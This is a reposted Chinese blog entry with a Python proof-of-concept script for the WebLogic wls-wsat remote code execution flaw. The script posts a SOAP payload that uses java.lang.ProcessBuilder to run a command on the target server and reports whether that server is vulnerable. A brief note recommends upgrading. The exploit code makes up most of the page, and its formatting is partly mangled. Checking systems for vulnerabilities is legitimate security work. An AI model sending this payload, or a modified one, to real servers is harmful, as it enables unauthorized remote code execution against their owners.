分享web开发知识

注册/登录|最近发布|今日推荐

主页 IT知识网页技术软件开发前端开发代码编程运营维护技术分享教程案例
当前位置:首页 > 代码编程

Weblogic wls RCE 漏洞验证POC

发布时间:2023-09-06 01:32责任编辑:彭小芳关键词:Web
#!/usr/bin/env python# coding:utf-8# @Date ???: 2017/12/22 17:11# @File ???: weblogic_poc.py# @Author ?: sevck (jianan.huang@qingteng.cn)# @Link ???: http://www.qingteng.cn ?????????????????#------------------------------------------------------------------------- ?import requestsimport refrom sys import argvheads = { ???‘User-Agent‘: ‘Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0‘, ???‘Accept‘: ‘text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8‘, ???‘Accept-Language‘: ‘zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3‘, ???‘Content-Type‘: ‘text/xml;charset=UTF-8‘ ???}def poc(url): ???if not url.startswith("http"): ???????url = "http://" + url ???if "/" in url: ???????url += ‘/wls-wsat/CoordinatorPortType‘ ???post_str = ‘‘‘ ???<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> ?????<soapenv:Header> ???????<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> ?????????<java> ???????????<object class="java.lang.ProcessBuilder"> ?????????????<array class="java.lang.String" length="2"> ???????????????<void index="0"> ?????????????????<string>/bin/touch</string> ???????????????</void> ???????????????<void index="1"> ?????????????????<string>/tmp/weblogic</string> ???????????????</void> ?????????????</array> ?????????????<void method="start"/> ???????????</object> ?????????</java> ???????</work:WorkContext> ?????</soapenv:Header> ?????<soapenv:Body/> ???</soapenv:Envelope> ???‘‘‘ ???try: ???????response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) ???????response = response.text ???????response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0) ???except Exception, e: ???????response = "" ???if ‘<faultstring>java.lang.ProcessBuilder‘ in response or "<faultstring>0" in response: ???????result = "Vulnerability" ???????return result ???else: ???????result = "No Vulnerability" ???????return resultif __name__ == ‘__main__‘: ???if len(argv) == 1: ???????print "python weblogic_poc.py url:port" ???????exit(0) ???else: ???????url = argv[1] ???result = poc(url=url) ???print result

说点修复建议:

个人建议直接更新最新版吧,老版本还是问题太多。昨晚和廖师父聊天中告知又提交了一个weblogic的RCE,已经拿到CVE就在等待发布了

Weblogic wls RCE 漏洞验证POC

原文地址:http://www.cnblogs.com/sevck/p/8092760.html

知识推荐

我的编程学习网——分享web前端后端开发技术知识。 垃圾信息处理邮箱 tousu563@163.com 网站地图
icp备案号 闽ICP备2023006418号-8 不良信息举报平台 互联网安全管理备案 Copyright 2023 www.wodecom.cn All Rights Reserved